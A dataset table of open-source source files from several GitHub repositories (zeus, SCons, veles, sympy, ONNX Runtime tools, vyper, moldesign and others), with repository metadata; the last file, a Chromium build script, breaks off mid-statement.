max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
zeus/api/resources/revision_file_coverage.py | conrad-kronos/zeus | 221 | 12684452 | from flask import request
from operator import or_
from zeus.models import FileCoverage, Revision
from zeus.utils.builds import fetch_build_for_revision
from .base_revision import BaseRevisionResource
from ..schemas import FileCoverageSchema
filecoverage_schema = FileCoverageSchema(many=True)
class RevisionFileCoverageResource(BaseRevisionResource):
def get(self, revision: Revision):
"""
Return a list of file coverage objects for a given revision.
"""
build = fetch_build_for_revision(revision)
if not build:
return self.respond(status=404)
build_ids = [original.id for original in build.original]
query = FileCoverage.query.filter(FileCoverage.build_id.in_(build_ids))
diff_only = request.args.get("diff_only") in ("1", "yes", "true")
if diff_only:
query = query.filter(
or_(
FileCoverage.diff_lines_covered > 0,
FileCoverage.diff_lines_uncovered > 0,
)
)
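        # Rank files that touch the diff (any covered or uncovered diff lines) ahead of the rest, then sort by filename.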
query = query.order_by(
(
FileCoverage.diff_lines_covered + FileCoverage.diff_lines_uncovered > 0
).desc(),
FileCoverage.filename.asc(),
)
return self.respond_with_schema(filecoverage_schema, query)
|
test/Decider/switch-rebuild.py | Valkatraz/scons | 1,403 | 12684457 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that switching Decider() types between MD5 and timestamp-match
does not cause unnecessary rebuilds.
"""
import TestSCons
test = TestSCons.TestSCons(match=TestSCons.match_re_dotall)
base_sconstruct_contents = """\
DefaultEnvironment(tools=[])
Decider('%s')
def build(env, target, source):
with open(str(target[0]), 'wt') as f, open(str(source[0]), 'rt') as ifp:
f.write(ifp.read())
B = Builder(action=build)
env = Environment(tools=[], BUILDERS = { 'B' : B })
env.B(target='switch.out', source='switch.in')
"""
def write_SConstruct(test, sig_type):
contents = base_sconstruct_contents % sig_type
test.write('SConstruct', contents)
# Build first using MD5 checksums.
write_SConstruct(test, 'MD5')
test.write('switch.in', "switch.in\n")
switch_out_switch_in = test.wrap_stdout(r'build\(\["switch.out"\], \["switch.in"\]\)\n')
test.run(arguments='switch.out', stdout=switch_out_switch_in)
test.up_to_date(arguments='switch.out')
# Now rebuild with timestamp-match. Because we always store timestamps,
# even when making the decision based on MD5 checksums, the build is
# still up to date.
write_SConstruct(test, 'timestamp-match')
test.up_to_date(arguments='switch.out')
# Now switch back to MD5 checksums. When we rebuilt with the timestamp,
# it wiped out the MD5 value (because the point of timestamps is to not
# open up and checksum the contents), so the file is considered *not*
# up to date and must be rebuilt to generate a checksum.
write_SConstruct(test, 'MD5')
test.not_up_to_date(arguments='switch.out')
# And just for good measure, make sure that we now rebuild in response
# to a content change.
test.write('switch.in', "switch.in 2\n")
test.run(arguments='switch.out', stdout=switch_out_switch_in)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
python/veles/scli/client.py | pombredanne/veles | 918 | 12684471 | # Copyright 2017 CodiLime
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import socket
import ssl
import msgpack
from veles.proto import messages, msgpackwrap
from veles.proto.messages import PROTO_VERSION
from veles.schema import nodeid
from veles.util import helpers
class Client(object):
def __init__(self, sock, key, name='scli', version='1.0',
description='', type='scli', quit_on_close=False):
self.sock = sock
wrapper = msgpackwrap.MsgpackWrapper()
self.unpacker = wrapper.unpacker
self.packer = wrapper.packer
self.client_name = name
self.client_version = version
self.client_description = description
self.client_type = type
self.quit_on_close = quit_on_close
self._authorize(helpers.prepare_auth_key(key))
def _authorize(self, key):
self.sock.sendall(key)
self.send_msg(messages.MsgConnect(
proto_version=PROTO_VERSION,
client_name=self.client_name,
client_version=self.client_version,
client_description=self.client_description,
client_type=self.client_type,
quit_on_close=self.quit_on_close,
))
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnected):
print('Connected to server: {}'.format(pkt.server_name))
elif isinstance(pkt, messages.MsgConnectionError):
raise pkt.err
else:
print(pkt)
raise Exception('weird reply when attempting to connect')
def getpkt(self):
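        # Drain any message already buffered by the msgpack unpacker; when it runs dry, read more bytes from the socket and feed them in.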
while True:
try:
return messages.MsgpackMsg.load(self.unpacker.unpack())
except msgpack.OutOfData:
pass
data = self.sock.recv(1024)
if not data:
raise Exception("end of file")
self.unpacker.feed(data)
def send_msg(self, msg):
self.sock.sendall(self.packer.pack(msg.dump()))
def request(self, msg):
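        # Synchronous request/response: callers build messages with rid=0, and we block until the matching ack or error for that id arrives.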
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgRequestAck) and pkt.rid == 0:
return msg.id
elif isinstance(pkt, messages.MsgRequestError) and pkt.rid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to request')
def create(self, parent, tags=set(), attr={}, data={}, bindata={},
pos=(None, None)):
msg = messages.MsgCreate(
id=nodeid.NodeID(),
parent=parent,
pos_start=pos[0],
pos_end=pos[1],
tags=tags,
attr=attr,
data=data,
bindata=bindata,
rid=0,
)
self.request(msg)
return msg.id
def delete(self, obj):
msg = messages.MsgDelete(
id=obj,
rid=0
)
self.request(msg)
def set_parent(self, obj, parent):
msg = messages.MsgSetParent(
id=obj,
parent=parent,
rid=0
)
self.request(msg)
def set_pos(self, obj, start, end):
msg = messages.MsgSetPos(
id=obj,
pos_start=start,
pos_end=end,
rid=0
)
self.request(msg)
def add_tag(self, obj, tag):
msg = messages.MsgAddTag(
id=obj,
tag=tag,
rid=0
)
self.request(msg)
def del_tag(self, obj, tag):
msg = messages.MsgDelTag(
id=obj,
tag=tag,
rid=0
)
self.request(msg)
def set_attr(self, obj, key, data):
msg = messages.MsgSetAttr(
id=obj,
key=key,
data=data,
rid=0
)
self.request(msg)
def set_data(self, obj, key, data):
msg = messages.MsgSetData(
id=obj,
rid=0,
key=key,
data=data,
)
self.request(msg)
def set_bindata(self, obj, key, start, data, truncate=False):
msg = messages.MsgSetBinData(
id=obj,
rid=0,
key=key,
start=start,
data=data,
truncate=truncate,
)
self.request(msg)
def get(self, obj):
msg = messages.MsgGet(
id=obj,
qid=0,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetReply) and pkt.qid == 0:
return pkt.obj
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get')
def get_sub(self, obj):
msg = messages.MsgGet(
id=obj,
qid=0,
sub=True,
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetReply) and pkt.qid == 0:
yield pkt.obj
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get')
def get_data(self, obj, key):
msg = messages.MsgGetData(
id=obj,
qid=0,
key=key,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetDataReply) and pkt.qid == 0:
return pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_data')
def get_data_sub(self, obj, key):
msg = messages.MsgGetData(
id=obj,
qid=0,
key=key,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetDataReply) and pkt.qid == 0:
yield pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_data')
def get_bindata(self, obj, key, start=0, end=None):
msg = messages.MsgGetBinData(
id=obj,
qid=0,
key=key,
start=start,
end=end,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetBinDataReply) and pkt.qid == 0:
return pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_bindata')
def get_bindata_sub(self, obj, key, start=0, end=None):
msg = messages.MsgGetBinData(
id=obj,
qid=0,
key=key,
start=start,
end=end,
sub=True,
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetBinDataReply) and pkt.qid == 0:
yield pkt.data
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
raise Exception('weird reply to get_bindata')
def list(self, obj):
msg = messages.MsgGetList(
qid=0,
parent=obj,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetListReply) and pkt.qid == 0:
return pkt.objs
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list')
def list_sub(self, obj):
msg = messages.MsgGetList(
qid=0,
parent=obj,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetListReply) and pkt.qid == 0:
yield pkt
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list')
def query(self, obj, sig, params, checks=None):
params = sig.params.dump(params)
msg = messages.MsgGetQuery(
qid=0,
node=obj,
query=sig.name,
params=params,
trace=checks is not None
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetQueryReply) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
return sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to get_query')
def query_sub(self, obj, sig, params, checks=None):
params = sig.params.dump(params)
msg = messages.MsgGetQuery(
qid=0,
node=obj,
query=sig.name,
params=params,
trace=checks is not None,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgGetQueryReply) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
yield sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
if checks is not None:
checks += pkt.checks
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to get_query')
def run_method(self, obj, sig, params):
params = sig.params.dump(params)
msg = messages.MsgMethodRun(
mid=0,
node=obj,
method=sig.name,
params=params
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgMethodResult) and pkt.mid == 0:
return sig.result.load(pkt.result)
elif isinstance(pkt, messages.MsgMethodError) and pkt.mid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to run_method')
def run_broadcast(self, sig, params):
params = sig.params.dump(params)
msg = messages.MsgBroadcastRun(
bid=0,
broadcast=sig.name,
params=params
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgBroadcastResult) and pkt.bid == 0:
return [sig.result.load(result) for result in pkt.results]
else:
print(pkt)
raise Exception('weird reply to run_broadcast')
def list_connections(self):
msg = messages.MsgListConnections(
qid=0,
)
self.send_msg(msg)
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnectionsReply) and pkt.qid == 0:
return pkt.connections
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list_connections')
def list_connections_sub(self):
msg = messages.MsgListConnections(
qid=0,
sub=True
)
self.send_msg(msg)
while True:
pkt = self.getpkt()
if isinstance(pkt, messages.MsgConnectionsReply) and pkt.qid == 0:
yield pkt
elif isinstance(pkt, messages.MsgQueryError) and pkt.qid == 0:
raise pkt.err
else:
print(pkt)
raise Exception('weird reply to list_connections')
class UnixClient(Client):
def __init__(self, path, key, **kwargs):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(path)
super(UnixClient, self).__init__(sock, key, **kwargs)
class TcpClient(Client):
def __init__(self, ip, port, key, **kwargs):
sock = socket.create_connection((ip, port))
super(TcpClient, self).__init__(sock, key, **kwargs)
class SslClient(Client):
def __init__(self, ip, port, key, fingerprint, **kwargs):
sock = socket.create_connection((ip, port))
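        # Wrap the TCP socket in TLS; the peer is authenticated below by pinning its certificate fingerprint rather than by CA chain verification.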
sc = ssl.SSLContext()
sock = sc.wrap_socket(sock)
cert = sock.getpeercert(True)
helpers.validate_cert(cert, fingerprint)
super(SslClient, self).__init__(sock, key, **kwargs)
def create_client(url):
url = helpers.parse_url(url)
if url.scheme == helpers.UrlScheme.UNIX_SCHEME:
return UnixClient(url.path, url.auth_key)
elif url.scheme == helpers.UrlScheme.TCP_SCHEME:
return TcpClient(url.host, url.port, url.auth_key)
elif url.scheme == helpers.UrlScheme.SSL_SCHEME:
return SslClient(url.host, url.port, url.auth_key, url.fingerprint)
else:
raise ValueError('Wrong scheme provided!')
|
blender_rendering/utils/fbx2bvh.py | yujiatay/deep-motion-editing | 966 | 12684476 | <reponame>yujiatay/deep-motion-editing
import bpy
import numpy as np
from os import listdir, path
def fbx2bvh(data_path, file):
sourcepath = data_path+"/"+file
bvh_path = data_path+"/"+file.split(".fbx")[0]+".bvh"
bpy.ops.import_scene.fbx(filepath=sourcepath)
frame_start = 9999
frame_end = -9999
action = bpy.data.actions[-1]
if action.frame_range[1] > frame_end:
frame_end = action.frame_range[1]
if action.frame_range[0] < frame_start:
frame_start = action.frame_range[0]
frame_end = np.max([60, frame_end])
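    # Export at least 60 frames even if the imported action is shorter.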
bpy.ops.export_anim.bvh(filepath=bvh_path,
frame_start=frame_start,
frame_end=frame_end, root_transform_only=True)
bpy.data.actions.remove(bpy.data.actions[-1])
print(data_path+"/"+file+" processed.")
if __name__ == '__main__':
data_path = "./fbx/"
directories = sorted([f for f in listdir(data_path) if not f.startswith(".")])
for d in directories:
files = sorted([f for f in listdir(data_path+d) if f.endswith(".fbx")])
for file in files:
fbx2bvh(path.join(data_path,d), file)
|
social/apps/django_app/default/config.py | raccoongang/python-social-auth | 1,987 | 12684490 | from social_django.config import PythonSocialAuthConfig
|
tools/ci_build/op_registration_utils.py | kimjungwow/onnxruntime-riscv | 6,036 | 12684509 | # !/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
'''
Utilities to help process files containing kernel registrations.
'''
import os
import sys
import typing
from logger import get_logger
log = get_logger("op_registration_utils")
def map_ort_constant_to_domain(ort_constant_name: str):
'''
Map the name of the internal ONNX Runtime constant used in operator kernel registrations to the domain name
used in ONNX models and configuration files.
:param ort_constant_name: ONNX Runtime constant name for the domain from a kernel registration entry.
:return: String with public domain name.
'''
# constants are defined in <ORT root>/include/onnxruntime/core/graph/constants.h
constant_to_domain_map = {'kOnnxDomain': 'ai.onnx',
'kMLDomain': 'ai.onnx.ml',
'kMSDomain': 'com.microsoft',
'kMSExperimentalDomain': 'com.microsoft.experimental',
'kMSNchwcDomain': 'com.microsoft.nchwc',
'kMSFeaturizersDomain': 'com.microsoft.mlfeaturizers',
'kMSDmlDomain': 'com.microsoft.dml',
'kNGraphDomain': 'com.intel.ai',
'kVitisAIDomain': 'com.xilinx'}
if ort_constant_name in constant_to_domain_map:
return constant_to_domain_map[ort_constant_name]
else:
log.warning('Unknown domain for ONNX Runtime constant of {}.'.format(ort_constant_name))
return None
def get_kernel_registration_files(ort_root=None, include_cuda=False):
'''
Return paths to files containing kernel registrations for CPU and CUDA providers.
:param ort_root: ORT repository root directory. Inferred from the location of this script if not provided.
:param include_cuda: Include the CUDA registrations in the list of files.
:return: list[str] containing the kernel registration filenames.
'''
if not ort_root:
ort_root = os.path.dirname(os.path.abspath(__file__)) + '/../..'
provider_path = ort_root + '/onnxruntime/core/providers/{ep}/{ep}_execution_provider.cc'
contrib_provider_path = ort_root + '/onnxruntime/contrib_ops/{ep}/{ep}_contrib_kernels.cc'
training_provider_path = ort_root + '/orttraining/orttraining/training_ops/{ep}/{ep}_training_kernels.cc'
provider_paths = [provider_path.format(ep='cpu'),
contrib_provider_path.format(ep='cpu'),
training_provider_path.format(ep='cpu')]
if include_cuda:
provider_paths.append(provider_path.format(ep='cuda'))
provider_paths.append(contrib_provider_path.format(ep='cuda'))
provider_paths.append(training_provider_path.format(ep='cuda'))
provider_paths = [os.path.abspath(p) for p in provider_paths]
return provider_paths
class RegistrationProcessor:
'''
Class to process lines that are extracted from a kernel registration file.
For each kernel registration, process_registration is called.
For all other lines, process_other_line is called.
'''
def process_registration(self, lines: typing.List[str], domain: str, operator: str,
start_version: int, end_version: typing.Optional[int] = None,
type: typing.Optional[str] = None):
'''
Process lines that contain a kernel registration.
:param lines: Array containing the original lines containing the kernel registration.
:param domain: Domain for the operator
:param operator: Operator type
:param start_version: Start version
:param end_version: End version or None if unversioned registration
:param type: Type used in registration, if this is a typed registration
'''
pass
def process_other_line(self, line):
'''
Process a line that does not contain a kernel registration
:param line: Original line
'''
pass
def ok(self):
'''
Get overall status for processing
:return: True if successful. False if not. Error will be logged as the registrations are processed.
'''
return False # return False as the derived class must override to report the real status
def _process_lines(lines: typing.List[str], offset: int, registration_processor: RegistrationProcessor):
'''
Process one or more lines that contain a kernel registration.
Merge lines if split over multiple, and call registration_processor.process_registration with the original lines
and the registration information.
:return: Offset for first line that was not consumed.
'''
onnx_op = 'ONNX_OPERATOR_KERNEL_CLASS_NAME'
onnx_op_len = len(onnx_op)
onnx_typed_op = 'ONNX_OPERATOR_TYPED_KERNEL_CLASS_NAME'
onnx_typed_op_len = len(onnx_typed_op)
onnx_versioned_op = 'ONNX_OPERATOR_VERSIONED_KERNEL_CLASS_NAME'
onnx_versioned_op_len = len(onnx_versioned_op)
onnx_versioned_typed_op = 'ONNX_OPERATOR_VERSIONED_TYPED_KERNEL_CLASS_NAME'
onnx_versioned_typed_op_len = len(onnx_versioned_typed_op)
end_marks = tuple([');', ')>', ')>,', ')>,};', ')>};'])
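    # A registration macro may be split across several source lines; any of these suffixes marks the line that closes it.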
end_mark = ''
lines_to_process = []
# merge line if split over multiple.
# original lines will be in lines_to_process. merged and stripped line will be in code_line
while True:
lines_to_process.append(lines[offset])
stripped = lines[offset].strip()
line_end = False
for mark in end_marks:
if stripped.endswith(mark):
end_mark = mark
line_end = True
break
if line_end:
break
offset += 1
if offset > len(lines):
log.error('Past end of input lines looking for line terminator.')
sys.exit(-1)
code_line = ''.join([line.strip() for line in lines_to_process])
if onnx_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 7, Cos)>,
trim_at = code_line.index(onnx_op) + onnx_op_len + 1
*_, domain, start_version, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), None, None)
elif onnx_typed_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_TYPED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 7, double, Sin)>,
trim_at = code_line.index(onnx_typed_op) + onnx_typed_op_len + 1
*_, domain, start_version, type, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), None, type)
elif onnx_versioned_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_VERSIONED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 1, 10, Hardmax)>,
trim_at = code_line.index(onnx_versioned_op) + onnx_versioned_op_len + 1
*_, domain, start_version, end_version, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), int(end_version), None)
elif onnx_versioned_typed_op in code_line:
# e.g. BuildKernelCreateInfo<ONNX_OPERATOR_VERSIONED_TYPED_KERNEL_CLASS_NAME(
# kCpuExecutionProvider, kOnnxDomain, 1, 10, float, LogSoftmax)>,
trim_at = code_line.index(onnx_versioned_typed_op) + onnx_versioned_typed_op_len + 1
*_, domain, start_version, end_version, type, op_type = \
[arg.strip() for arg in code_line[trim_at: -len(end_mark)].split(',')]
registration_processor.process_registration(lines_to_process, domain, op_type,
int(start_version), int(end_version), type)
else:
log.warning("Ignoring unhandled kernel registration variant: {}".format(code_line))
for line in lines_to_process:
registration_processor.process_other_line(line)
return offset + 1
def process_kernel_registration_file(filename: str, registration_processor: RegistrationProcessor):
'''
Process a kernel registration file using registration_processor.
:param filename: Path to file containing kernel registrations.
:param registration_processor: Processor to be used.
:return: True if processing was successful.
'''
if not os.path.isfile(filename):
log.error('File not found: {}'.format(filename))
return False
lines = []
with open(filename, 'r') as file_to_read:
lines = file_to_read.readlines()
offset = 0
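    # Walk the file line by line: kernel registration entries are parsed (they may span lines), everything else is passed through unchanged.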
while offset < len(lines):
line = lines[offset]
stripped = line.strip()
if stripped.startswith('BuildKernelCreateInfo<ONNX'):
offset = _process_lines(lines, offset, registration_processor)
else:
registration_processor.process_other_line(line)
offset += 1
|
sympy/utilities/__init__.py | nashalex/sympy | 8,323 | 12684550 | """This module contains some general purpose utilities that are used across
SymPy.
"""
from .iterables import (flatten, group, take, subsets,
variations, numbered_symbols, cartes, capture, dict_merge,
prefixes, postfixes, sift, topological_sort, unflatten,
has_dups, has_variety, reshape, default_sort_key, ordered,
rotations)
from .misc import filldedent
from .lambdify import lambdify
from .source import source
from .decorator import threaded, xthreaded, public, memoize_property
from .timeutils import timed
__all__ = [
'flatten', 'group', 'take', 'subsets', 'variations', 'numbered_symbols',
'cartes', 'capture', 'dict_merge', 'prefixes', 'postfixes', 'sift',
'topological_sort', 'unflatten', 'has_dups', 'has_variety', 'reshape',
'default_sort_key', 'ordered', 'rotations',
'filldedent',
'lambdify',
'source',
'threaded', 'xthreaded', 'public', 'memoize_property',
'timed',
]
|
test/lib/__init__.py | noryb009/rmc | 164 | 12684599 | from acceptance_test_case import AcceptanceTestCase # @UnusedImport
from flask_test_case import FlaskTestCase # @UnusedImport
from model_test_case import ModelTestCase # @UnusedImport
from fixtures_test_case import FixturesTestCase # @UnusedImport
|
src/python/tldrstory/database.py | neuml/tldrstory | 260 | 12684603 | <reponame>neuml/tldrstory<filename>src/python/tldrstory/database.py
"""
Database module
"""
class Database(object):
"""
Defines data structures and methods to store article content.
"""
def save(self, article):
"""
Saves an article.
Args:
article: article metadata and text content
"""
def complete(self):
"""
Signals processing is complete and runs final storage methods.
"""
def close(self):
"""
Commits and closes the database.
"""
|
tests/parser/globals/test_globals.py | upgradvisor/vyper | 1,471 | 12684622 | <reponame>upgradvisor/vyper<filename>tests/parser/globals/test_globals.py
from pytest import raises
from vyper.exceptions import UndeclaredDefinition
def test_permanent_variables_test(get_contract_with_gas_estimation):
permanent_variables_test = """
struct Var:
a: int128
b: int128
var: Var
@external
def __init__(a: int128, b: int128):
self.var.a = a
self.var.b = b
@external
def returnMoose() -> int128:
return self.var.a * 10 + self.var.b
"""
c = get_contract_with_gas_estimation(permanent_variables_test, *[5, 7])
assert c.returnMoose() == 57
print("Passed init argument and variable member test")
def test_missing_global(get_contract):
code = """
@external
def a() -> int128:
return self.b
"""
with raises(UndeclaredDefinition):
get_contract(code)
|
moldesign/units/unitsystem.py | Autodesk/molecular-design-toolkit | 147 | 12684638 | <filename>moldesign/units/unitsystem.py
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .constants import *
class UnitSystem(object):
""" Class for standardizing units - specifies preferred units for length, mass, energy etc.
In MDT, many methods will automatically convert output using the UnitSystem at
``moldesign.units.default``
Args:
length (MdtUnit): length units
mass (MdtUnit): mass units
time (MdtUnit): time units
energy (MdtUnit): energy units
temperature (MdtUnit): temperature units (default: kelvin)
force (MdtUnit): force units (default: energy/length)
momentum (MdtUnit): momentum units (default: mass * length / time)
angle (MdtUnit): angle units (default: radians)
charge (MdtUnit): charge units (default: fundamental charge)
"""
def __init__(self, length, mass, time, energy,
temperature=kelvin,
force=None, momentum=None,
angle=radians,
charge=q_e):
self.length = length
self.mass = mass
self.time = time
self.energy = energy
self.temperature = temperature
self.force = force
self.momentum = momentum
self.angle = angle
self.charge = charge
def __getitem__(self, item):
""" For convenience when using pint dimensionality descriptions.
This aliases self['item'] = self['[item]'] = self.item,
e.g. self['length'] = self['[length]'] = self.length
"""
itemname = item.lstrip('[').rstrip(']')
return getattr(self, itemname)
@property
def force(self):
if self._force is None:
return self.energy / self.length
else:
return self._force
@force.setter
def force(self, f):
self._force = f
@property
def momentum(self):
if self._momentum is None:
return self.mass * self.length / self.time
else:
return self._momentum
@momentum.setter
def momentum(self, f):
self._momentum = f
def convert(self, quantity):
""" Convert a quantity into this unit system.
Args:
quantity (MdtQuantity or MdtUnit): quantity to convert
"""
baseunit = self.get_baseunit(quantity)
if baseunit == ureg.dimensionless:
return quantity * ureg.dimensionless
else:
result = quantity.to(baseunit)
return result
def get_default(self, q):
""" Return the default unit system for objects with these dimensions
Args:
q (MdtQuantity or MdtUnit): quantity to get default units for
Returns:
MdtUnit: Proper units for this quantity
"""
return self.get_baseunit(1.0 * q).units
def convert_if_possible(self, quantity):
if isinstance(quantity, MdtQuantity):
return self.convert(quantity)
else:
return quantity
def get_baseunit(self, quantity):
""" Get units of a quantity, list or array
Args:
quantity (Any): any number or list-like object with units
Raises:
TypeError: if the passed object cannot have units (e.g., it's a string or ``None``)
Returns:
MdtUnit: units found in the passed object
"""
try:
dims = dict(quantity.dimensionality)
except AttributeError:
try:
q = quantity[0]
except (TypeError, StopIteration):
if isinstance(quantity, (int, float, complex)):
return ureg.dimensionless
raise TypeError('This type of object cannot have physical units')
if isinstance(q, str):
raise TypeError('This type of object cannot have physical units')
try:
return self.get_baseunit(q)
except (IndexError, TypeError): # Assume dimensionless
return ureg.dimensionless
baseunit = ureg.dimensionless
# Factor out force units
if self._force:
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -2:
baseunit *= self['force']
dims['[length]'] -= 1
dims['[mass]'] -= 1
dims['[time]'] += 2
# Factor out energy units
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -2:
baseunit *= self['energy']
dims['[length]'] -= 2
dims['[mass]'] -= 1
dims['[time]'] += 2
# Factor out momentum units
if self._momentum:
if '[length]' in dims and '[mass]' in dims and '[time]' in dims:
while dims['[length]'] >= 1 and dims['[mass]'] >= 1 and dims['[time]'] <= -1:
baseunit *= self['momentum']
dims['[length]'] -= 1
dims['[mass]'] -= 1
dims['[time]'] += 1
if '[current]' in dims:
dims.setdefault('[charge]', 0)
dims.setdefault('[time]', 0)
dims['[charge]'] += dims['[current]']
dims['[time]'] -= dims['[current]']
dims.pop('[current]')
# Otherwise, just use the units
for unit in dims:
if dims[unit] == 0:
continue
try:
baseunit *= self[unit]**dims[unit]
except AttributeError:
baseunit *= ureg[unit]**dims[unit]
return baseunit.units
default = UnitSystem(length=angstrom, mass=amu, time=fs, energy=eV)
atomic_units = UnitSystem(length=a0, mass=m_e, time=t0, energy=hartree)
nano_si = UnitSystem(length=nm, mass=dalton, time=fs, energy=kjpermol) |
tools/win/link_limiter/build_link_limiter.py | kjthegod/chromium | 2,151 | 12684655 | <reponame>kjthegod/chromium
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import shutil
import subprocess
import sys
import tempfile
BUILD_DIR = 'build'
def run_with_vsvars(cmd, tmpdir=None):
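  # Write a throwaway .bat that loads the Visual Studio environment via vsvars32.bat, optionally cds into tmpdir, runs cmd, and returns (returncode, stdout).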
fd, filename = tempfile.mkstemp('.bat', text=True)
with os.fdopen(fd, 'w') as f:
print >> f, '@echo off'
print >> f, r'call "%VS100COMNTOOLS%\vsvars32.bat"'
if tmpdir:
print >> f, r'cd %s' % tmpdir
print >> f, cmd
try:
p = subprocess.Popen([filename], shell=True, stdout=subprocess.PIPE,
